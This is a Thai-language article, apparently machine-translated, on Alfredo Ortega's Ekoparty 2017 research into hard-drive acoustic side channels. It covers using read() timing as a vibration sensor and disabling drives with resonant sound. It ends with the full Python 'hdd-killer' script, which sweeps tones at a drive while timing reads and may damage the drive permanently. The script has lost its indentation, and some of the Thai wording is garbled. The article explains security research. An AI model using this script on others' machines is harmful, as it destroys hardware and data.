ในการประชุมความปลอดภัยคอมพิวเตอร์ Ekoparty 2017 ในบัวโนสไอเรส แฮ็กเกอร์ชาวอาร์เจนตินา Alfredo Ortega แสดงให้เห็นถึงการพัฒนาที่น่าสนใจมาก นั่นคือระบบสำหรับการดักฟังโทรศัพท์แอบแฝงในสถานที่โดยไม่ต้องใช้ไมโครโฟน เสียง !
HDD จะจับเสียงความถี่ต่ำที่มีความเข้มสูง เสียงฝีเท้า และความสั่นสะเทือนอื่นๆ เป็นหลัก คำพูดของมนุษย์ยังไม่สามารถรับรู้ได้แม้ว่านักวิทยาศาสตร์ก็ตาม (การรู้จำเสียงพูดด้วยการสั่นสะเทือนความถี่ต่ำซึ่งบันทึก เช่น จากไจโรสโคปหรือ HDD)
เสียง คือ การสั่นของอากาศหรือตัวกลางอื่น บุคคลรับรู้ผ่านแก้วหูซึ่งส่งการสั่นสะเทือนไปยังหูชั้นใน ไมโครโฟนได้รับการออกแบบมาคล้ายกับหู การสั่นสะเทือนจะถูกบันทึกโดยเมมเบรนบางๆ เช่นกัน ซึ่งจะกระตุ้นแรงกระตุ้นทางไฟฟ้า แน่นอนว่าฮาร์ดไดรฟ์ยังอยู่ภายใต้การสั่นสะเทือนระดับจุลภาคเนื่องจากความผันผวนของอากาศโดยรอบ สิ่งนี้เป็นที่รู้จักจากคุณสมบัติทางเทคนิคของ HDD: ผู้ผลิตมักจะระบุระดับการสั่นสะเทือนสูงสุดที่อนุญาตและตัวฮาร์ดไดรฟ์เองก็มักจะพยายามวางไว้ในภาชนะป้องกันการสั่นสะเทือนที่ทำจากยางหรือวัสดุฉนวนอื่น ๆ จากนี้จึงสรุปได้ง่ายว่าสามารถบันทึกเสียงโดยใช้ HDD ได้ สิ่งที่เหลืออยู่ก็คือการหาวิธี
Alfredo Ortega เสนอรูปแบบการโจมตีด้านข้างที่ไม่เหมือนใคร นั่นคือการโจมตีครั้ง การโจมตีนี้ขึ้นอยู่กับสมมติฐานว่ามีการดำเนินการที่แตกต่างกันบนอุปกรณ์ในเวลาที่ต่างกัน ขึ้นอยู่กับข้อมูลอินพุตที่กำหนด ในกรณีนี้ “ข้อมูลอินพุต” คือการสั่นของหัวอ่านและแผ่น HDD ซึ่งสัมพันธ์กับการสั่นสะเทือนของสภาพแวดล้อม กล่าวคือ ด้วยเสียง ดังนั้น ด้วยการวัดเวลาในการคำนวณและดำเนินการวิเคราะห์ข้อมูลทางสถิติ จึงสามารถวัดการสั่นสะเทือนของส่วนหัว/แผ่นเสียง และด้วยเหตุนี้จึงสามารถวัดการสั่นสะเทือนของตัวกลางได้ ยิ่งความล่าช้าในการอ่านข้อมูลนานขึ้น การสั่นของ HDD ก็จะยิ่งแรงขึ้น ส่งผลให้เสียงดังมากขึ้นเท่านั้น
จะวัดการสั่นสะเทือนของฮาร์ดไดรฟ์ได้อย่างไร? ง่ายมาก: เพียงเรียกใช้การเรียกของระบบ read () - และบันทึกเวลาที่ใช้ในการทำให้เสร็จ ระบบปฏิบัติการสมัยใหม่ช่วยให้คุณอ่านเวลาของการเรียกของระบบด้วยความแม่นยำระดับนาโนวินาที
ความเร็วในการอ่านข้อมูลจากเซกเตอร์จะขึ้นอยู่กับตำแหน่งของส่วนหัวและแผ่นเสียงซึ่งมีความสัมพันธ์กับการสั่นสะเทือนของเคส HDD นั่นคือทั้งหมดที่
การวิเคราะห์ทางสถิติดำเนินการโดยใช้ยูทิลิตี Kscope อย่างง่าย อย่างที่พวกเขาพูดกันว่าทุกสิ่งที่ชาญฉลาดนั้นเรียบง่าย
ยูทิลิตี้ Kscope (สถิติ () syscall)
Kscope เป็นโปรแกรมอรรถประโยชน์ขนาดเล็กสำหรับแสดงภาพความแตกต่างเล็กๆ น้อยๆ ของเวลาดำเนินการเรียกของระบบ แหล่งที่มา.
ในที่เก็บแยกต่างหาก มียูทิลิตี้เวอร์ชันที่กำหนดค่าสำหรับการโจมตีตามเวลาบนฮาร์ดไดรฟ์นั่นคือกำหนดค่าให้วิเคราะห์การเรียกของระบบ read ().
สาธิตการบันทึกเสียงโดยใช้ HDD การทำงานของยูทิลิตี Kscope
แน่นอนว่าคำพูดไม่สามารถเข้าใจได้ด้วยวิธีนี้ แต่ HDD ค่อนข้างเหมาะที่จะเป็นเซ็นเซอร์ตรวจจับการสั่นสะเทือน ตัวอย่างเช่น คุณสามารถลงทะเบียนได้หากบุคคลที่สวมรองเท้าแข็งหรือเท้าเปล่าเข้าไปในห้องพร้อมกับคอมพิวเตอร์ (อาจเป็นไปได้ว่าหากผู้โจมตีสวมรองเท้าผ้าใบเนื้อนุ่มหรือมีพรมหนาบนพื้น HDD จะไม่สามารถบันทึกการสั่นสะเทือนได้ - นี่ควรค่าแก่การตรวจสอบ) คอมพิวเตอร์สามารถบันทึกกระจกที่แตกหรือเหตุการณ์อื่นๆ ที่มีความเข้มของเสียงสูงได้ นั่นคือฮาร์ดไดรฟ์สามารถใช้เป็นระบบตรวจจับการบุกรุกโดยไม่ได้รับอนุญาตได้
นักฆ่า HDD
นอกจากนี้ ยังสามารถใช้เทคนิคที่คล้ายกันนี้ในการปิดการทำงานของฮาร์ดไดรฟ์ได้ อย่างไรก็ตาม ในกรณีนี้ เราไม่ได้ตรวจจับการสั่นสะเทือนจากฮาร์ดไดรฟ์ แต่เราสร้างการสั่นสะเทือนแล้วส่งไปยังฮาร์ดไดรฟ์ หากคุณเล่นเสียงจากลำโพงด้วยความถี่ที่ตรงกับความถี่ของฮาร์ดไดรฟ์ ระบบจะปิดการทำงานของอุปกรณ์นั้นในไม่ช้าด้วยข้อผิดพลาด I/O (เคอร์เนล) Linux (การดำเนินการนี้จะปิดฮาร์ดไดรฟ์โดยสมบูรณ์หลังจาก 120 วินาที) ฮาร์ดไดรฟ์อาจเสียหายอย่างถาวรได้
แกนกลาง Linux ฮาร์ดไดรฟ์ปิดตัวลงหลังจากเล่นเสียงด้วยความถี่เรโซแนนซ์ผ่านลำโพง USB Edifier r19u เป็นเวลา 120 วินาที ลำโพงถูกเปิดใช้งานที่กำลังไฟประมาณหนึ่งในสี่ (น้อยกว่า 100 มิลลิวัตต์) และวางห่างจากฮาร์ดไดรฟ์ 20 เซนติเมตร โดยหันไปทางโต๊ะเพื่อขยายการสั่นสะเทือน ภาพนิ่งจาก พร้อมสาธิตเครื่องทำลาย HDD
น่าแปลกใจที่บางครั้ง "การโจมตี" บน HDD เกิดขึ้นโดยบังเอิญในชีวิตประจำวัน ตัวอย่างเช่น ในเดือนกันยายน 2016 ศูนย์ข้อมูล ING Bank ถูกบังคับให้ระงับการดำเนินงานเป็นเวลา 10 ชั่วโมงหลังจากการฝึกซ้อมดับเพลิง เนื่องจากมีเสียงดังของก๊าซเฉื่อยที่ถูกปล่อยออกมาจากกระบอกสูบภายใต้แรงดันสูง เสียงดังมาก (มากกว่า 130 เดซิเบล) แต่คุณไม่สามารถตะโกนใส่ฮาร์ดไดรฟ์ได้ - ซึ่งจะเพิ่มความล่าช้าในการเข้าถึง HDD
การสาธิตเสียงกรีดร้องของมนุษย์ใส่ฮาร์ดไดรฟ์ในศูนย์ข้อมูล การวัดความหน่วง
เพื่อสร้างเสียงที่สะท้อนกลับ Alfredo Ortega ได้เขียนสคริปต์ Python ชื่อ ().
มีขนาดเล็กมาก คุณจึงสามารถเผยแพร่ทั้งหมดได้ที่นี่
"""PyAudio hdd-killer: Generate sound and interfere with HDD """
"""Alfredo Ortega @ortegaalfredo"""
"""Usage: hdd-killer /dev/sdX"""
"""Where /dev/sdX is a spinning hard-disk drive"""
"""Turn the volume to the max for better results"""
"""Requires: pyaudio. Install with 'sudo pip install pyaudio' or 'sudo apt-get install python-pyaudio'"""
import pyaudio
import time
import sys
import math
import random
RATE=48000
FREQ=50
# validation. If a disk hasn't been specified, exit.
if len(sys.argv) < 2:
print "hdd-killer: Attempt to interfere with a hard disk, using sound.nn" +
"The disk will be opened as read-only.n" +
"Warning: It might cause damage to HDD.n" +
"Usage: %s /dev/sdX" % sys.argv[0]
sys.exit(-1)
# instantiate PyAudio (1)
p = pyaudio.PyAudio()
x1=0
NEWFREQ=FREQ
# define audio synt callback (2)
def callback(in_data, frame_count, time_info, status):
global x1,FREQ,NEWFREQ
data=''
sample=0
for x in xrange(frame_count):
oldsample=sample
sample=chr(int(math.sin(x1*((2*math.pi)/(RATE/FREQ)))*127)+128)
data = data+sample
# continous frequency change
if (NEWFREQ!=FREQ) and (sample==chr(128)) and (oldsample<sample) :
FREQ=NEWFREQ
x1=0
x1+=1
return (data, pyaudio.paContinue)
# open stream using callback (3)
stream = p.open(format=pyaudio.paUInt8,
channels=1,
rate=RATE,
output=True,
stream_callback=callback)
# start the stream (4)
stream.start_stream()
# wait for stream to finish (5)
while stream.is_active():
timeprom=0
c=file(sys.argv[1])
for i in xrange(20):
a=time.clock()
c.seek(random.randint(0,1000000000),1) #attempt to bypass file buffer
c.read(51200)
b=time.clock()
timeprom+=b-a
c.close()
timeprom/=20
print("Frequency: %.2f Hz File Read prom: %f us" % (FREQ,timeprom*1000000))
NEWFREQ+=0.5
# stop stream (6)
stream.stop_stream()
stream.close()
# close PyAudio (7)
p.terminate()ที่มา: will.com
